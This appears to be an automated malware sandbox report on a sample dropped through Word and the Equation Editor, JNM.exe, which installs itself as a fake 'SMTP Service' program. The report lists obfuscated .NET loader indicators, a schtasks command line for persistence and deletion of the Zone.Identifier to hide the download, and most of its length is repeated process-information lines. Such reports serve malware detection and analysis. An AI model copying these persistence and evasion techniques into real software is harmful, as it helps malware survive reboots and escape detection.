Source:	Binary string: 8inaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: JNM.exe, 0000000F.00000002.2356007529.0000000000373000.00000004.00000020.sdmp
Source:	Binary string: >vbpC:\Users\user\AppData\Roaming\JNM.PDBBPJQ source: JNM.exe, 00000003.00000002.2356038607.00000000003E8000.00000004.00000001.sdmp
Source:	Binary string: 8(P5jLC:\Windows\Microsoft.VisualBasic.pdb source: JNM.exe, 0000000F.00000002.2355712720.0000000000298000.00000004.00000001.sdmp
Source:	Binary string: Qsers\user\AppData\Roaming\JNM.exeVisualBasic.pdb*n source: JNM.exe, 00000003.00000002.2356207673.00000000004FA000.00000004.00000020.sdmp
Source:	Binary string: 8C:\Users\user\AppData\Roaming\JNM.PDB source: JNM.exe, 0000000F.00000002.2355712720.0000000000298000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\user\AppData\Roaming\JNM.exe77-1006j_731629843\objr\x86\Microsoft.VisualBasic.pdbisualBasic.pdb source: JNM.exe, 00000003.00000002.2356038607.00000000003E8000.00000004.00000001.sdmp, JNM.exe, 0000000F.00000002.2355712720.0000000000298000.00000004.00000001.sdmp
Source:	Binary string: QC:\Users\user\AppData\Roaming\JNM.PDB source: JNM.exe, 00000003.00000002.2356038607.00000000003E8000.00000004.00000001.sdmp
Source:	Binary string: M.PDBr source: JNM.exe, 0000000F.00000002.2356007529.0000000000373000.00000004.00000020.sdmp
Source:	Binary string: (P5jLC:\Windows\Microsoft.VisualBasic.pdb source: JNM.exe, 00000003.00000002.2356038607.00000000003E8000.00000004.00000001.sdmp
Source:	Binary string: ,:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: JNM.exe, 0000000F.00000002.2356007529.0000000000373000.00000004.00000020.sdmp
Source:	Binary string: )vbpC:\Users\user\AppData\Roaming\JNM.PDB.x source: JNM.exe, 0000000F.00000002.2355712720.0000000000298000.00000004.00000001.sdmp
Source:	Binary string: :\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: JNM.exe, 00000003.00000002.2366184294.0000000006EF0000.00000004.00000001.sdmp

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: 7.2.JNM.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.2.JNM.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 23.2.JNM.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 23.2.JNM.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 26.2.smtpsvc.exe.400000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 26.2.smtpsvc.exe.400000.1.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\user\AppData\Roaming\JNM.exe	Code function: 7_2_0044C3E8 push esp; iretd
Source: C:\Users\user\AppData\Roaming\JNM.exe	Code function: 7_2_006F234F push 00000000h; iretd

Source: 7.2.JNM.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 7.2.JNM.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 23.2.JNM.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 23.2.JNM.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 26.2.smtpsvc.exe.400000.1.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 26.2.smtpsvc.exe.400000.1.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'

Persistence and Installation Behavior:

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\JNM.exe			Jump to dropped file
Source: C:\Users\user\AppData\Roaming\JNM.exe	File created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe			Jump to dropped file

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: unknown

Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp6D54.tmp'

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Users\user\AppData\Roaming\JNM.exe

File opened: C:\Users\user\AppData\Roaming\JNM.exe:Zone.Identifier read attributes | delete

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskeng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskeng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskeng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskeng.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\JNM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX
